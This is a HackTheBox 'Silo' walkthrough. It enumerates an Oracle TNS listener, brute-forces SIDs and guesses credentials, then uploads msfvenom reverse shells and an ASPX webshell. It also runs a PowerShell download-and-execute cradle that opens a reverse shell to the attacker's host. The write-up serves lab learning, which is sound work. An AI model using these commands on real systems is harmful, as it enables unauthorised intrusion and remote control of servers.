This page looks best with JavaScript enabled

Hackthebox - Silo

Exploitation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
nmap -sS -p- --vv 10.10.10.82

PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 127
135/tcp   open  msrpc        syn-ack ttl 127
139/tcp   open  netbios-ssn  syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
1521/tcp  open  oracle       syn-ack ttl 127
5985/tcp  open  wsman        syn-ack ttl 127
47001/tcp open  winrm        syn-ack ttl 127
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49155/tcp open  unknown      syn-ack ttl 127
49159/tcp open  unknown      syn-ack ttl 127
49160/tcp open  unknown      syn-ack ttl 127
49161/tcp open  unknown      syn-ack ttl 127
49162/tcp open  unknown      syn-ack ttl 127
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
nmap -sV -sC -vv -p 80,135,139,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN silo_scan.txt

PORT      STATE SERVICE      REASON          VERSION
80/tcp    open  http         syn-ack ttl 127 Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   syn-ack ttl 127 Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open  oracle-tns   syn-ack ttl 127 Oracle TNS listener (requires service name)
49160/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49161/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49162/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 56050/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52707/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38458/udp): CLEAN (Timeout)
|   Check 4 (port 57335/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-time: 
|   date: 2023-01-08T02:24:06
|_  start_date: 2023-01-08T02:17:30
| smb2-security-mode: 
|   302: 
|_    Message signing enabled but not required
|_clock-skew: mean: 12s, deviation: 0s, median: 12sbas
1
2
3
4
nmap --script "oracle-tns-version" -p 1521 -T4 -sV 10.10.10.82

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
gobuster dir -u http://10.10.10.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.82/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/07 23:17:41 Starting gobuster in directory enumeration mode
===============================================================
/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
/**http%3A            (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog    (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 3420]
/s%26p                (Status: 400) [Size: 3420]
/%3FRID%3D2671        (Status: 400) [Size: 3420]
/devinmoore*          (Status: 400) [Size: 3420]
/200109*              (Status: 400) [Size: 3420]
/*sa_                 (Status: 400) [Size: 3420]
/*dc_                 (Status: 400) [Size: 3420]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 3420]
/Chamillionaire%20%26%20Paul%20Wall-%20Get%20Ya%20Mind%20Correct (Status: 400) [Size: 3420]
/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY%29 (Status: 400) [Size: 3420]
/DJ%20Haze%20%26%20The%20Game%20-%20New%20Blood%20Series%20Pt (Status: 400) [Size: 3420]
/http%3A%2F%2Fradar   (Status: 400) [Size: 3420]
/q%26a2               (Status: 400) [Size: 3420]
/login%3f             (Status: 400) [Size: 3420]
/Shakira%20Oral%20Fixation%201%20%26%202 (Status: 400) [Size: 3420]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 3420]
/http%3A%2F%2Fweblog  (Status: 400) [Size: 3420]
/http%3A%2F%2Fswik    (Status: 400) [Size: 3420]
Progress: 220454 / 220561 (99.95%)===============================================================
2023/01/07 23:27:23 Finished

Exploitation

Oracle TNS Listener Security: Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (tcp port 1521, by default), it starts up a new database process and establishes a connection between the client and the database.

1
2
3
4
5
6
tnscmd10g version -p 1521 -h 10.10.10.82

sending (CONNECT_DATA=(COMMAND=version)) to 10.10.10.82:1521
writing 90 bytes
reading
.e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))
1
2
3
4
5
6
tnscmd10g version -p 1521 -h 10.10.10.82 --10G

sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=version)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to 10.10.10.82:1521
writing 182 bytes
reading
.e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))
1
2
3
4
5
tnscmd10g status-p 1521 -h 10.10.10.82 --10G
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status-p)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to 10.10.10.82:1521
writing 183 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12508)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12508)(EMFI=4))))

Failed to get the SID

SID enumeration

What is a SID?: The SID (Service Identifier) is essentially the database name, depending on the installation you may have one or more default SIDs, or even a totally custom dba defined SID.

SID Bruteforce

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid

[DATA] max 16 tasks per 1 server, overall 16 tasks, 576 login tries (l:576/p:1), ~36 tries per task
[DATA] attacking oracle-sid://10.10.10.82:1521/
[1521][oracle-sid] host: 10.10.10.82   login: XE
[1521][oracle-sid] host: 10.10.10.82   login: PLSExtProc
[STATUS] 413.00 tries/min, 413 tries in 00:01h, 163 to do in 00:01h, 16 active
[1521][oracle-sid] host: 10.10.10.82   login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82
1 of 1 target successfully completed, 4 valid passwords found
1
2
3
4
5
6
7
8
msf6 auxiliary(admin/oracle/sid_brute) > set rhosts 10.10.10.82
rhosts => 10.10.10.82
msf6 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 10.10.10.82

[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'

ODAT

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.

Usage examples of ODAT:

  • You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
  • You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA
  • You have a Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database

Tested on Oracle Database 10g, 11g, 12c, 18c and 19c.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
./odat.py all -s 10.10.10.82 -p 1521 -d XE    
[+] Checking if target 10.10.10.82:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.10.10.82:1521 is well configured. Continue...

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

[2] (10.10.10.82:1521): Searching valid accounts on the XE SID
The login cis has already been tested at least once. What do you want to do:                                       | ETA:  00:01:19 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password                                     | ETA:  00:03:30 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password                                     | ETA:  00:03:12 
[!] Notice: 'dip' account is locked, so skipping this username for password                                        | ETA:  00:02:50 
[!] Notice: 'hr' account is locked, so skipping this username for password                                         | ETA:  00:01:54 
[!] Notice: 'mdsys' account is locked, so skipping this username for password                                      | ETA:  00:01:17 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password                                 | ETA:  00:00:56 
[!] Notice: 'outln' account is locked, so skipping this username for password                                      | ETA:  00:00:49 
[+] Valid credentials found: scott/tiger. Continue...   #####################################                      | ETA:  00:00:25 
[!] Notice: 'xdb' account is locked, so skipping this username for password###################################     | ETA:  00:00:04 
100% |#############################################################################################################| Time: 00:02:01 
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger


[3] (10.10.10.82:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[3.1] UTL_HTTP library ?
[-] KO
[3.2] HTTPURITYPE library ?
02:07:24 WARNING -: Impossible to fetch all the rows of the query select httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[3.3] UTL_FILE library ?
[-] KO
[3.4] JAVA library ?
[-] KO
[3.5] DBMSADVISOR library ?
[-] KO
[3.6] DBMSSCHEDULER library ?
[-] KO
[3.7] CTXSYS library ?
[-] KO
[3.8] Hashed Oracle passwords ?
[-] KO
[3.9] Hashed Oracle passwords with a view in ORACLE_OCM?
02:07:24 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[3.10] Hashed Oracle passwords from history?
[-] KO
[3.11] DBMS_XSLPROCESSOR library ?
[-] KO
[3.12] External table to read files ?
[-] KO
[3.13] External table to execute system commands ?
[-] KO
[3.14] Oradbg ?
[-] KO
[3.15] DBMS_LOB to read files ?
[-] KO
[3.16] SMB authentication capture ?
[-] KO
[3.17] Gain elevated access (privilege escalation)?
[3.17.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[3.17.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[3.17.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[3.17.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[3.17.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[3.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[3.19] Create file on target (CVE-2018-3004)?
[-] KO
[3.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO

[4] (10.10.10.82:1521): Oracle users have not the password identical to the username ?
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password                                    | ETA:  00:00:00 
The login XS$NULL has already been tested at least once. What do you want to do:                                   | ETA:  00:00:02 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password                                | ETA:  01:03:50 
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password                           | ETA:  00:42:27 
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password                                | ETA:  00:30:35 
[!] Notice: 'HR' account is locked, so skipping this username for password                                         | ETA:  00:23:01 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password                                      | ETA:  00:17:47 
[!] Notice: 'XDB' account is locked, so skipping this username for password                                        | ETA:  00:11:01 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password                                     | ETA:  00:08:42 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password                                  | ETA:  00:06:49 
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password#                                    | ETA:  00:05:16 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password####                             | ETA:  00:03:58 
[!] Notice: 'DIP' account is locked, so skipping this username for password#################                       | ETA:  00:02:51 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password#####################                 | ETA:  00:01:54 
100% |#############################################################################################################| Time: 00:11:04 
[-] No found a valid account on 10.10.10.82:1521/sid:XE with usernameLikePassword module

[+] Accounts found on 10.10.10.82:1521/sid:XE: scott/tiger

odat has ultfile where I can upload files to get a reverse shell

1
2
3
4
5
/odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --test-module

[1] (10.10.10.82:1521): Test if the UTL_FILE library can be used
[1.1] UTL_FILE library ?
[-] KO

Windows meterpreter payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f exe > reverse.exe

nc -lvnp 1234

Both of these payloads worked

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile "C:\Windows\Temp" "C:\Windows\Temp\reverse.exe" "/home/sake/hackthebox/silo/reverse.exe"

I do not have the privileges to put a reverse shell

1
2
3
4
./odat.py tnspoison -s 10.10.10.82 -p 1521 -d XE --test-module

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

Vulnerable to TNS poisoning CVE-2012-1675

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
./odat.py all -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger    

[+] Checking if target 10.10.10.82:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.10.10.82:1521 is well configured. Continue...

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

[2] (10.10.10.82:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[2.1] UTL_HTTP library ?
[-] KO
[2.2] HTTPURITYPE library ?
14:13:38 WARNING -: Impossible to fetch all the rows of the query select httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[2.3] UTL_FILE library ?
[-] KO
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[-] KO
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[-] KO
[2.8] Hashed Oracle passwords ?
[-] KO
[2.9] Hashed Oracle passwords with a view in ORACLE_OCM?
14:13:38 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[2.10] Hashed Oracle passwords from history?
[-] KO
[2.11] DBMS_XSLPROCESSOR library ?
[-] KO
[2.12] External table to read files ?
[-] KO
[2.13] External table to execute system commands ?
[-] KO
[2.14] Oradbg ?
[-] KO
[2.15] DBMS_LOB to read files ?
[-] KO
[2.16] SMB authentication capture ?
[-] KO
[2.17] Gain elevated access (privilege escalation)?
[2.17.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[2.17.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.17.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.17.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.17.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[2.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[2.19] Create file on target (CVE-2018-3004)?
[-] KO
[2.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO

[3] (10.10.10.82:1521): Oracle users have not the password identical to the username ?
The login XS$NULL has already been tested at least once. What do you want to do:                                   | ETA:  00:00:00 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password                                | ETA:  00:00:14 
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password                           | ETA:  00:00:10 
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password                                | ETA:  00:00:07 
[!] Notice: 'HR' account is locked, so skipping this username for password                                         | ETA:  00:00:06 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password                                      | ETA:  00:00:05 
[!] Notice: 'XDB' account is locked, so skipping this username for password                                        | ETA:  00:00:03 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password                                     | ETA:  00:00:02 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password                                  | ETA:  00:00:02 
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password#                                    | ETA:  00:00:01 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password####                             | ETA:  00:00:01 
[!] Notice: 'DIP' account is locked, so skipping this username for password#################                       | ETA:  00:00:01 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password#####################                 | ETA:  00:00:00 
100% |#############################################################################################################| Time: 00:00:10 
[-] No found a valid account on 10.10.10.82:1521/sid:XE with usernameLikePassword module
1
2
3
4
5
./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --test-module           

[1] (10.10.10.82:1521): Test if the UTL_FILE library can be used
[1.1] UTL_FILE library ?
[-] KO

./odat.py utlfile -h

SYSDBA and SYSOPER are administrative privileges required to perform high-level administrative operations such as creating, starting up, shutting down, backing up, or recovering the database. The SYSDBA system privilege is for fully empowered database administrators and the SYSOPER system privilege allows a user to perform basic operational tasks, but without the ability to look at user data.

Adding --sysdba to the utlfile

upload the payload

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --putFile "C:\Windows\Temp" "C:\Windows\Temp\reverse.exe" "/home/sake/hackthebox/silo/reverse.exe"

1
2
[1] (10.10.10.82:1521): Put the /home/sake/hackthebox/silo/reverse.exe local file in the C:\Windows\Temp folder like C:\Windows\Temp\reverse.exe on the 10.10.10.82 server
[+] The /home/sake/hackthebox/silo/reverse.exe file was created on the C:\Windows\Temp directory on the 10.10.10.82 server like the C:\Windows\Temp\reverse.exe file

start listener with meterpreter

1
2
3
4
msf6 exploit(multi/handler) > set lhost 10.10.14.2
msf6 exploit(multi/handler) > set lport 1234
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Execute

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec "C:\Windows\Temp" "reverse.exe"

Craft payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f exe > rev_test.exe

Upload

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --putFile "C:\Windows\Temp" "C:\Windows\Temp\rev_test.exe" "/home/sake/hackthebox/silo/rev_test.exe"

Execute

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec "C:\Windows\Temp" "rev_test.exe"

The other method following ODAT Installation and sqlplus

  • Follow installation from:https://github.com/quentinhardy/oda. Need to have an account with oracle to download the basic, devel, and sqlplus files

Install python3-dev, alien and libaio1 package (for sqlplus):

sudo apt-get install libaio1 python3-dev alien python3-pip

Generate DEB files from RPM files:

sudo alien --to-deb *.rpm

Install instant client basic, sdk and sqplus:

sudo dpkg -i *.deb

Put these lines in your /etc/profile file in order to define Oracle env variables:

1
2
3
export ORACLE_HOME=/usr/lib/oracle/11.2/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Install CX_Oracle

pip3 install cx_Oracle

Test if all is good, should just return w/o errors

python3 -c 'import cx_Oracle'

Install some python libraries:

1
2
3
sudo apt-get install python3-scapy
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

install the development version of pyinstaller

pip3 install pyinstaller

Run ODAT

./odat.py -h

https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener

Now, that you know a valid SID and valid credentials. To connect to the database you need the tool: sqlplus and to install it you need to follow some steps:

sqlplus scott/tiger@10.10.10.82:1521/XE;

https://relentlesscoding.com/posts/oracle-sqlplus-cheatsheet/
Show the Privileges of Your User
SELECT * FROM USER_SYS_PRIVS;
SELECT * FROM USER_TAB_PRIVS;
SELECT * FROM USER_ROLE_PRIVS;

Disconnect from the Database and login as administrator

sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba;

Ref: https://docs.oracle.com/database/121/ADMQS/GUID-DE8A79BD-FAE4-4364-98FF-D2BD992A06E7.htm#ADMQS0361

After passing the all parameter

/opt/odat/odat.py all -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE

/opt/odat/odat.py -h

Using the utlfile module to upload a web shell and passing the --sysdba parameter

Testing upload

/opt/odat/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile "c:\inetpub\wwwroot" "c:\inetpub\wwwroot\test.txt" "/home/sake/hackthebox/silo/test.txt" --sysdba

Copy aspx webshell

cp /usr/share/webshells/aspx/cmdasp.aspx ./

Upload

/opt/odat/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile "c:\inetpub\wwwroot" "c:\inetpub\wwwroot\cmdasp.aspx" "/home/sake/hackthebox/silo/cmdasp.aspx" --sysdba

Download the nishang Invoke-PowerShellTcp.ps1

wget https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Start python web server

python -m http.server 80

Add the to the end of the Invoke-PowerShellTcp script

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 1234

Start listener

nc -lnvp 1234

Run the following to execute payload in the webshell

powershell -nop -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')

Privilege Escalation

Do not have access to Administrator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
PS C:\Users\Phineas\Desktop> more "Oracle issue.txt"  
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
?%Hm8646uC$

There is a password in Oracle issue.txt which is ?%Hm8646uC$ but it did not work. Trying to read the password directly from the webshell with more "C:\Users\Phineas\Desktop\Oracle issue.txt”

1
2
link password:
£%Hm8646uC$

unzip SILO-20180105-221806.zip

MemoryDump

What is a DMP file? The DMP file is primarily associated with the MemoryDump or Minidump file format. It is used in Microsoft Windows operating system to store data that has been dumped from the memory space of the computer. Usually, DMP files are created when a file crashes or an error occurs.

Volatility for MemoryDump: https://github.com/volatilityfoundation/volatility

Installation

1
2
3
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility
python2 setup.py install

You might not be able to run volatility right away. There is a good guide below to follow to continue the installation. There will be more errors but googling them will solve it. As stated in the repository it requires python 2.6 or later but no 3.0.

Here is a good guide to setup volatility: https://netsidetech.ca/2021/02/07/how-to-install-volatility-in-kali/

1
2
3
file SILO-20180105-221806.dmp     
    
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, full dump, 261996 pages

When the dump is small (just some KB, maybe a few MB) then it’s probably a mini-dump crash report and not a memory dump but not in this case.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
PS C:\windows\system32\inetsrv>systeminfo

Host Name:                 SILO
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00115-23036-AA976
Original Install Date:     12/31/2017, 11:01:23 PM
System Boot Time:          1/10/2023, 4:58:25 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,848 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,368 MB
Virtual Memory: In Use:    1,431 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 149 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894852
                           [05]: KB2903939
                           [06]: KB2911106
                           [07]: KB2919355
                           [08]: KB2919394
                           [09]: KB2928680
                           [10]: KB2934520
                           [11]: KB2938066
                           [12]: KB2954879
                           [13]: KB2966826
                           [14]: KB2966828
                           [15]: KB2967917
                           [16]: KB2968296
                           [17]: KB2972103
                           [18]: KB2973114
                           [19]: KB2973351
                           [20]: KB2989930
                           [21]: KB3000850
                           [22]: KB3003057
                           [23]: KB3004361
                           [24]: KB3004365
                           [25]: KB3012702
                           [26]: KB3013172
                           [27]: KB3013791
                           [28]: KB3014442
                           [29]: KB3019978
                           [30]: KB3021910
                           [31]: KB3022777
                           [32]: KB3023219
